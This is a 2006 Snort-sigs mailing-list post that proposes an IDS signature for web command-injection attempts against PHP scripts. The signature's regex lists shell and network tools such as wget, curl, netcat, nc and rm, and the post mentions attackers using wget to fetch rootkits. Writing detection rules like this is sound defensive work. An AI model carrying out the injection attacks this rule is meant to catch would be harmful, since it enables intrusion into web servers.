[Snort-sigs] Sig 1147

Jamie Riden jamesr at ...3216...
Fri May 26 05:04:22 EDT 2006


On 26/04/06, nnposter at ...592...
<nnposter at ...592...> wrote:
<snip>
> If you really, really insist on this rule even though the vulnerability
> is so old you should do something like:

(The given vulnerability is old, but the 'cat%20' payload could easily
occur in exploits for recent PHP command injection problems )

>     flow:to_server,established;
>     uricontent:"webdist.cgi";
>     pcre:"/webdist\.cgi.+\bcat[ \t]/U";
<snip>
> Cheers,
> nnposter

The cat%20 rule was causing me too many false positives (including
this message I expect :). Instead of turning it off, what about
combining as follows:

alert tcp any any -> any any (msg:"WEB-ATTACKS web command attempt";
flow:to_server,established; uricontent:"\.php?";
pcre:"/\b(wget|curl|cc|chgrp|kill|chown\
|echo|rm|lsof|ls|perl|ping|netcat|cat|nc|nmap|gcc|g\+\+|traceroute|ftp|tftp)[
\t]/U"; classtype:web-application-activity; sid:2123156; rev:1;)

Any problems with this? Hopefully it should catch people trying to
exploit the vulnerable PHP script du jour. ( Every time a new remote
include, or command injection problem comes out (e.g. Horde issue last
week), someone sees if they can 'wget' their favourite rootkit.)

Is it more efficient to create more rules with uricontent:"\.pl" ,
"\.cgi" , or is it better to match both, and .cgi in the pcre as well?

cheers,
 Jamie
--
Jamie Riden / jamesr at ...3216... / jamie.riden at ...3217...
"Microsoft: Bringing the world to your desktop - and your desktop to
 the world." -- Peter Gutmann




More information about the Snort-sigs mailing list